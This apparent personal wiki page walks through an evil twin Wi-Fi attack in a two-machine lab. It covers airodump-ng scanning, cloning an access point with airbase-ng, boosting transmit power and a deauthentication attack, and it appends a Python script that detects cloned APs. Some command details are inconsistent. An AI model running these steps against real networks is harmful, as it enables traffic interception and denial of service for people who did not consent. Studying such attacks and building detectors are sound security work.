Evil Twin/Setup
From charlesreid1
Setup
The Machines
A note on machine names.
kronos is the sheep.
mars is the attacker.
Goodies
On the attacking machine:
mars $ apt-get install bridge-utils
Procedure
Connect Sheep to Good Twin
The first step is to connect the sheep to the good twin:
$ iw dev wlan1 scan
$ wpa_supplicant -D nl80211,wext -i wlan1 -c <(wpa_passphrase "YourESSIDHere" "YourPassphraseHere")
Device Information
Get info about your devices:
mars $ iwconfig
AP Information
Get info about the Good Twin AP:
mars $ airodump-ng wlan0
Create Evil Twin (Window 1)
To create our Evil Twin AP, we'll use airbase-ng:
mars $ airbase-ng -a <BSSID> --essid <ESSID> -c <channel> <interface>
or, to make it shorter,
mars $ airbase-ng --essid <ESSID of network> <interface>
So for example, we might listen for the Good Twin router on channel 11, see it, then create our base station:
mars $ airbase-ng -a AA:BB:CC:DD:EE:FF --essid "HomeRouter" -c 10 wlan1
21:39:29 Created tap interface at0
21:39:29 Trying to set MTU on at0 to 1500
21:39:29 Trying to set MTU on wlan1 to 1800
21:39:29 Access Point with BSSID AA:BB:CC:DD:EE:FF started.
Make Evil Twin Obnoxious
THIS STEP IS ENTIRELY OPTIONAL AND NOT RECOMMENDED.
To make sure that the Sheep only hears the Evil Twin, you can crank up the power:
mars $ iwconfig wlan0 txpower 27
WARNING: You can break the law by transmitting at too high a power. Know the laws. You are responsible for your actions and you are responsible for not breaking the law.
DUH.
Anyway...
Deauth Sheep on Good Twin (Window 2)
Now, kick the Sheep off of the Good Twin router using aireplay-ng's deauth attack:
mars $ aireplay-ng -0 1 -a <Sheep MAC Address> wlan1
Once the sheep has been kicked off, it will begin to look for the Good Twin again. But the Evil Twin will be there instead.
Connecting Sheep to Evil Twin
The Sheep will begin to look for the Good Twin, will see the Evil Twin, and will connect to it.
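Detecting the Evil Twin
Seen from the defender's side, the clone set up above stands out in scan data: the same BSSID and ESSID show up on a second channel, and the security advertised no longer matches the real AP. The following is an added example, not part of the original page; the baseline values, the observation format and the function name are assumptions, and the sample observations are constructed.

```python
from collections import defaultdict

# Known-good baseline for the protected network (constructed values).
BASELINE = {
    "HomeRouter": {"bssid": "AA:BB:CC:DD:EE:FF", "channel": 11, "security": "WPA2"},
}

# Constructed scan observations: (bssid, essid, channel, security).
OBSERVATIONS = [
    ("AA:BB:CC:DD:EE:FF", "HomeRouter", 11, "WPA2"),
    ("AA:BB:CC:DD:EE:FF", "HomeRouter", 10, "OPEN"),
    ("11:22:33:44:55:66", "CoffeeShop", 6, "WPA2"),
]


def find_evil_twin_indicators(observations, baseline):
    """Return a sorted list of (essid, reason) findings for baseline ESSIDs."""
    findings = set()
    channels_by_ap = defaultdict(set)
    for bssid, essid, channel, security in observations:
        known = baseline.get(essid)
        if known is None:
            continue  # not a network we protect
        bssid = bssid.upper()
        channels_by_ap[(essid, bssid)].add(channel)
        if bssid != known["bssid"].upper():
            findings.add((essid, f"unknown BSSID {bssid}"))
        if channel != known["channel"]:
            findings.add((essid, f"unexpected channel {channel}"))
        if security != known["security"]:
            findings.add((essid, f"security {security}, expected {known['security']}"))
    # One BSSID beaconing on several channels at once points to a cloned AP.
    for (essid, bssid), channels in channels_by_ap.items():
        if len(channels) > 1:
            chans = ",".join(str(c) for c in sorted(channels))
            findings.add((essid, f"BSSID {bssid} beaconing on channels {chans}"))
    return sorted(findings)


if __name__ == "__main__":
    for essid, reason in find_evil_twin_indicators(OBSERVATIONS, BASELINE):
        print(f"[!] {essid}: {reason}")
```

A legitimate AP can change channel on its own, so the channel finding is a prompt to investigate; the security mismatch and the multi-channel BSSID are the stronger signals.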